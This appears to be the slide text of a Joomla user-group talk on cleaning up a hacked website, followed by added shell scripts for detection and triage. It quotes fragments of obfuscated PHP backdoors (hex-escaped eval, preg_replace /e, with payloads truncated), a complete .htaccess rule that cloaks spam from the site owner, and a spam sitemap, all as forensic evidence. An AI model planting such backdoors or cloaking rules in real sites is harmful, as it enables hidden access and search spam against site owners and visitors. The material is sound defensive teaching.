During a routine check, Peter discovered that a customer's website contained some strange new files. After a few thorough scans he found that the website had been "hacked".
What do you do when your website has been hacked? In this presentation (given at Joomla User Group Den Bosch) Peter discusses why websites get hacked, shows some website hacks, and demonstrates how to restore a website.
19. Do I have admin access to the website?
Joomla User Group Den Bosch – 1 December 2014
Website hacked 3
Customer
SSH on website
Backup (just in case)
?!?! size difference from previous backup?
Suspicious php files & viagra sitemap.xml
20. Backdoor 1
/includes/xmlrpc.php - 07 September 2014 23:15:01
<?php
# GNU LESSER GENERAL PUBLIC LICENSE
# Version 3, 29 June 2007
#
# Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
# Everyone is permitted to copy and distribute verbatim copies
# of this license document, but changing it is not allowed.
[..]
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
$auth_pass = "52fd812f55cb3118bb3bfe575b59a02d";
$color = "#df5";preg_replace("/.*/e","x65x76x61x6Cx28x67x7Ax69x6Ex66x6Cx61x74x65x28x62x61x73x65x36x34x5Fx64x65x63x6Fx64x65x28'[..]
(The hex escapes spell eval(gzinflate(base64_decode(; the /e modifier makes preg_replace execute the replacement string as PHP.)
Not in the backup of 18 October 2014!
Hacked on 19 October 2014
21. Payload 1
.htaccess - 09 November 11:45:48
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing|spaumbot) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^([^/]*)/$ /main.php?p=$1 [L]
##
# @package Joomla
# @copyright Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.
# @license GNU General Public License version 2 or later; see LICENSE.txt
##
Added (in front of the existing Joomla .htaccess)
Only search-engine crawlers and visitors arriving from a search engine are rewritten to main.php; the site owner browsing the site sees nothing unusual (cloaking).
Hack via backdoor by 2nd hacker
22. Hack via backdoor by 2nd hacker, added on 9 November 2014.
Payload 2
main.php - 10 July 2013 11:25:27
<?php Error_Reporting(0);
$xTBYAB76GYfo="[..]";preg_replace("/.*/e","x65x76x61x6Cx28x62x61x73x65x36x34x5Fx64x65x63x6Fx64x65x28'[..]
Decoded:
preg_replace("/.*/e","eval(base64_decode('
23. Hack via backdoor by 2nd hacker, added on 9 November 2014.
Payload 3
sitemap.xml - 9 November 2014 11:50:42
<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
<url>
<loc>http://www.voorbeeld.nl/viagraprofessional100mg/</loc>
<lastmod>2014-11-09</lastmod>
<changefreq>monthly</changefreq>
<priority>1.0</priority>
</url>
<url>
<loc>http://www.voorbeeld.nl/longtermsideeffectsofcialis/</loc>
<lastmod>2014-11-09</lastmod>
<changefreq>monthly</changefreq>
<priority>1.0</priority>
</url>
<url>
<loc>http://www.voorbeeld.nl/priceofviagra100mgtablet/</loc>
<lastmod>2014-11-09</lastmod>
<changefreq>monthly</changefreq>
<priority>1.0</priority>
</url>
</urlset>
590 spam links
Each of these URLs matches the RewriteRule of Payload 1, so a crawler that follows the sitemap is served by main.php.
24. Via backdoor by 2nd hacker, added on 9 November 2014.
Backdoor 2
/libraries/joomla/session/cache.php
19 August 2013 14:45:46
Modified!
<?php Error_Reporting(0);
$x0bp6Rx0vRH="[..]";preg_replace("/.*/e","x65x76x61x6Cx28x62x61x73x65x36x34x5Fx64x65x63x6Fx64x65x28'[..]
Decoded:
preg_replace("/.*/e","eval(base64_decode('
25. Via backdoor by 2nd hacker, added on 9 November 2014.
Backdoor 3
/administrator/fs-login.phtml - 09 November 2014 11:45:48
<?php Error_Reporting(0);
$xJdU8NfauOq="[..]";preg_replace("/.*/e","x65x76x61x6Cx28x62x61x73x65x36x34x5Fx64x65x63x6Fx64x65x28'[..]
Decoded:
preg_replace("/.*/e","eval(base64_decode('
26. Via backdoor by 2nd hacker, added on 9 November 2014.
Backdoor 4-9
Added on 09 November 2014 11:45:48
/language/comnon.phtml
/layouts/fedit.php
/libraries/fedit.php
/logs/comnon.php
/plugins/fs-login.phtml
/tmp/Iicense.php
contain:
<?php Error_Reporting(0);
preg_replace("/.*/e","x65x76x61x6Cx28x62x61x73x65x36x34x5Fx64x65x63x6Fx64x65x28
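An added example, not code from the presentation: a scan for the signatures visible in the backdoors and payloads above (preg_replace with the /e modifier, eval(base64_decode(, hex-escaped eval, silenced error reporting next to a long encoded string, .phtml files, crawler-cloaking rewrites). The demo web root it scans is constructed here; its file names mirror the slides, the payloads are replaced by [..].

```shell
#!/bin/sh
# Added example, not code from the presentation. Lists PHP sources showing the
# obfuscation of Backdoor 1-9 and Payload 2, and .htaccess files that cloak
# crawler traffic like Payload 1. The demo web root below is constructed.

# Strong indicators: preg_replace() with the /e modifier (PHP evaluates the
# replacement as code), eval(base64_decode(, gzinflate(, and "eval(" written
# as hex escapes \x65\x76\x61\x6C (matched with or without the backslashes).
STRONG='preg_replace\([^,]{1,60}/e[^A-Za-z0-9_]|eval\(base64_decode\(|gzinflate\(|\\?x65\\?x76\\?x61\\?x6[cC]'
SILENT='[Ee]rror_[Rr]eporting\(0\)'   # weak: errors silenced ...
BLOB='[A-Za-z0-9+/=]{60,}'            # ... next to a long base64-like literal
# Rewrite rules keyed on search-engine user agents or referrers (cloaking).
CLOAK='RewriteCond[[:space:]]+%[{]HTTP_(USER_AGENT|REFERER)[}].*(google|yahoo|msn|aol|bing)'

# scan_webroot DIR: prints "reason<TAB>path" per finding and always returns 0.
scan_webroot() {
    find "$1" -type f \( -name '*.php' -o -name '*.phtml' \) | sort |
    while IFS= read -r f; do
        if grep -qE "$STRONG" "$f"; then
            printf 'obfuscated\t%s\n' "$f"
        elif grep -qE "$SILENT" "$f" && grep -qE "$BLOB" "$f"; then
            printf 'silent+blob\t%s\n' "$f"
        fi
        # Joomla core ships no .phtml files; one in the web root is odd by itself.
        case "$f" in *.phtml) printf 'phtml\t%s\n' "$f" ;; esac
    done
    find "$1" -type f -name '.htaccess' | sort |
    while IFS= read -r f; do
        grep -qE "$CLOAK" "$f" && printf 'cloaking\t%s\n' "$f" || :
    done
    return 0
}

# Constructed demo web root mirroring the slides; payloads replaced by [..].
demo=$(mktemp -d); trap 'rm -rf "$demo"' EXIT
mkdir -p "$demo/includes" "$demo/libraries/joomla/session" "$demo/administrator"
blob=$(printf 'Zm9vYmFy%.0s' 1 2 3 4 5 6 7 8 9 10)    # 80 base64-looking chars
cat >"$demo/includes/xmlrpc.php" <<'EOF'
<?php preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28'[..]'\x29\x29");
EOF
printf '<?php Error_Reporting(0);$x="%s";preg_replace("/.*/e","eval(base64_decode(\047[..]\047))");\n' "$blob" >"$demo/main.php"
printf '<?php Error_Reporting(0);$x="%s";\n' "$blob" >"$demo/libraries/joomla/session/cache.php"
printf '<?php Error_Reporting(0);\n' >"$demo/administrator/fs-login.phtml"
printf 'RewriteEngine On\nRewriteCond %%{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\nRewriteCond %%{HTTP_REFERER} (google|yahoo|msn|aol|bing)\nRewriteRule ^([^/]*)/$ /main.php?p=$1 [L]\n' >"$demo/.htaccess"
printf '<?php defined("_JEXEC") or die; echo preg_replace("/a/", "b", $s);\n' >"$demo/index.php"

scan_webroot "$demo"
```

Every hit still needs a human look (base64 decode, diff against the original file); the clean index.php with an ordinary preg_replace() call is deliberately not reported.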
29. Terminal
Text Terminal
“TTY” TeleTYpewriter
30. Terminal
Windows
– SSH program: PuTTY
Mac OSX
– Built in: “Terminal”
Linux
– Built-in terminal emulator
31. SSH
Secure SHell
uses public-key cryptography
(authentication & secure data communication)
peter@computer:~$ ssh peter@192.168.0.10
32. SSH
peter@computer:~$ ssh peter@example.com
The authenticity of host 'example.com (93.184.216.119)' can't be established.
RSA key fingerprint is 10:51:ab:f5:d7:[..]:17:16:1f:22:33.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'example.com,93.184.216.119' (RSA) to the list of known hosts.
peter@example.com's password:
peter@example.com ~ $
35. Backup files
Backup from before the hack?
– Hosting provider?
– Akeeba backup (offline)?
Make a backup of the current situation (including the hack!)
– Akeeba backup
– Rsync / MySQL dump
36. rsync
Remote synchronization
– rsync from “source” to “destination”, each written as username@server:folder
$ rsync -arv peter@voorbeeld.nl:~/joomla-cms/ /var/www/joomla-cms-backup/
37. MySQL Dump
$ mysqldump -u gebruikersnaam -p databasenaam > bestand-met-sql-uitvoer.txt
39. Analysis
● Software versions:
– CMS (Joomla version?)
– Versions of 3rd party extensions?
● Access logfiles
– Strange POST requests?
40. Analysis
● New files on the server
– .php files in the /images/ folder?
● Files with strange code
– Base64 decode
● Compare files with the original files
– diff
41. New files
Created in the last 7 days (ctime is the inode change time: a newly written file always gets a fresh one, and it cannot be backdated with touch the way mtime can):
find . -type f -ctime -7
42. Recently changed
Changed between 7 and 3 days ago:
find . -type f -mtime -7 ! -mtime -3
47. diff
Compare the website's files with the original files:
– Get a folder with the original Joomla + extensions
● Old backup, or
● Fresh installation of Joomla + extensions
– Get a folder with the hacked website
Use diff software to compare:
– Linux + OSX: Meld
– Windows: WinMerge
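As an added example (not from the presentation), the analysis steps of slides 40 to 47 as one shell script: files changed inside a time window, then a file-by-file comparison against a clean copy, the command-line counterpart of Meld/WinMerge. The "clean" and "site" directory trees are constructed for the demo; the backdated main.php stands in for the forged 2013 timestamp shown on Payload 2.

```shell
#!/bin/sh
# Added example, not code from the presentation: the analysis steps above as
# one script, namely files changed inside a time window, then a file-by-file
# comparison with a clean copy (the command-line counterpart of Meld/WinMerge).
# The "clean" and "site" trees below are constructed for the demo.

# changed_since DIR DAYS: files created or changed in the last DAYS days.
# Both ctime and mtime are checked: a backdoor may carry a forged mtime
# (main.php above claims July 2013), but ctime cannot be backdated with touch.
changed_since() {
    find "$1" -type f \( -ctime "-$2" -o -mtime "-$2" \) | sort
}

# triage CLEAN SITE: classify every file under SITE against the clean copy.
#   added     only present in the hacked site (e.g. a .php file in /images/)
#   modified  present in both, but the content differs
triage() {
    clean=$1; site=$2
    ( cd "$site" && find . -type f ) | sort | while IFS= read -r rel; do
        rel=${rel#./}
        if [ ! -f "$clean/$rel" ]; then
            printf 'added\t%s\n' "$rel"
        elif ! cmp -s "$clean/$rel" "$site/$rel"; then
            printf 'modified\t%s\n' "$rel"
        fi
    done
    return 0
}

# Constructed trees: a fresh Joomla copy and the hacked site.
root=$(mktemp -d); trap 'rm -rf "$root"' EXIT
clean=$root/clean; site=$root/site
mkdir -p "$clean/includes" "$clean/images" "$site/includes" "$site/images"
printf '<?php defined("_JEXEC") or die;\n' | tee "$clean/index.php" >"$site/index.php"
printf '<?php // xml-rpc helper\n' >"$clean/includes/xmlrpc.php"
printf '<?php // xml-rpc helper\n$auth_pass = "[..]";\n' >"$site/includes/xmlrpc.php"  # modified
printf '<?php Error_Reporting(0); // [..]\n' >"$site/main.php"                        # added
printf '<?php // [..]\n' >"$site/images/pic.php"                                       # added
touch -t 201307101125 "$site/main.php"    # forged mtime, as on main.php above

echo '# changed in the last 7 days (ctime or mtime):'; changed_since "$site" 7
echo '# mtime alone misses the backdated backdoor:'; find "$site" -type f -mtime -7 | sort
echo '# against the clean copy:'; triage "$clean" "$site"
```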
54. Questions?
Peter Martin
e-mail: info at db8.nl
website: www.db8.nl
twitter: @pe7er
Presentation: http://www.db8.nl
55. Used Photos
Title slide:
Guy Fawkes Mask - Ben Fredericson, 2009
http://commons.wikimedia.org/wiki/File:Guy_Fawkes_Mask.jpg
1. Why hack?
Question mark (3534516458) - Marco Bellucci, 2005
http://commons.wikimedia.org/wiki/File:Question_mark_(3534516458).jpg
Credit-cards - Lotus Head, 2005
http://commons.wikimedia.org/wiki/File:Credit-cards.jpg
Pickpocket girl - Lunch Photography, 2008
http://commons.wikimedia.org/wiki/File:Pickpocket_girl.jpg
Graffiti-Sokolov5 - Orange.man, 2008
http://commons.wikimedia.org/wiki/File:Graffiti-Sokolov5.JPG
Phishing - Stomchak, 2010
http://commons.wikimedia.org/wiki/File:Phishing.JPG
Spam 2 - Bodo Akdeniz, 2005
http://commons.wikimedia.org/wiki/File:Spam_2.jpg
Plugboard wires - Daniel Sancho, 2005
http://commons.wikimedia.org/wiki/File:Plugboard_wires.ds.jpg
56. Used Photos
WAC telephone operators operate the Victory switchboard during the Potsdam Conference in their headquarters in... - U.S. National Archives and Records Administration, 1945
http://commons.wikimedia.org/wiki/File:WAC_telephone_operators_operate_the_Victory_switchboard_during_the_Potsdam_Conference_in_their_headquarters_in..._-_NARA_-_199007.jpg
Butterfly Labs Bitcoin miner - arstechnica.com, 2013
http://cdn.arstechnica.net/wp-content/uploads/2013/05/IMG_6048-Version-3.jpg
Cirencester, market place - Tony Grist, 2008
http://commons.wikimedia.org/wiki/File:Cirencester,_market_place.jpg
2. Hacked
Youve-been-hacked, Hanonen, 2014
http://commons.wikimedia.org/wiki/File:Youve-been-hacked.jpg
Piedbiche - Isabelle Grosjean, 2001
http://commons.wikimedia.org/wiki/File:Piedbiche.jpg
3. SSH connection
Switchboard Manual - Peel Conner, Geez-oz, 2012
http://commons.wikimedia.org/wiki/File:Switchboard_Manual_-_Peel_Conner.JPG
Bundesarchiv Bild 183-2008-0516-500, Fernschreibmaschine mit Telefonanschluss - Illger, Willi, 1930
http://commons.wikimedia.org/wiki/File:Bundesarchiv_Bild_183-2008-0516-500,_Fernschreibmaschine_mit_Telefonanschluss.jpg
57. Used Photos
4. Procedure
Motorola M6800 manuals - Michael Holley, 2010
http://commons.wikimedia.org/wiki/File:Motorola_M6800_manuals.jpg
Backup
IBM 7330 on white background, Crisco 1492, 2013
http://commons.wikimedia.org/wiki/File:IBM_7330_on_white_background.jpg
Analysis
Postcards and magnifying glass, Anna, 2007
http://commons.wikimedia.org/wiki/File:Postcards_and_magnifying_glass.jpg
Magnifying glass on antique table - Stéphane Magnenat, 2008
http://commons.wikimedia.org/wiki/File:Magnifying_glass_on_antique_table.jpg
Magnifying glass - Faberge - shakko, 2011
http://commons.wikimedia.org/wiki/File:Magnifying_glass_-_Faberge.jpg
Binary Code, Cncplayer, 2013
http://commons.wikimedia.org/wiki/File:Binary_Code.jpg
Two different shoes on, Kelly Bailey, 2007
http://commons.wikimedia.org/wiki/File:Two_different_shoes_on.jpg
Recovery
IBM 650 at Texas A&M open for repair - Cushing Memorial Library and Archives, Texas A&M, 2009
http://commons.wikimedia.org/wiki/File:IBM_650_at_Texas_A%26M_open_for_repair.jpg
Conclusion
EquinoxeJuniorHighPac-Man - Equinoxe, 2012
http://www.c64-wiki.com/index.php/File:EquinoxeJuniorHighPac-Man.png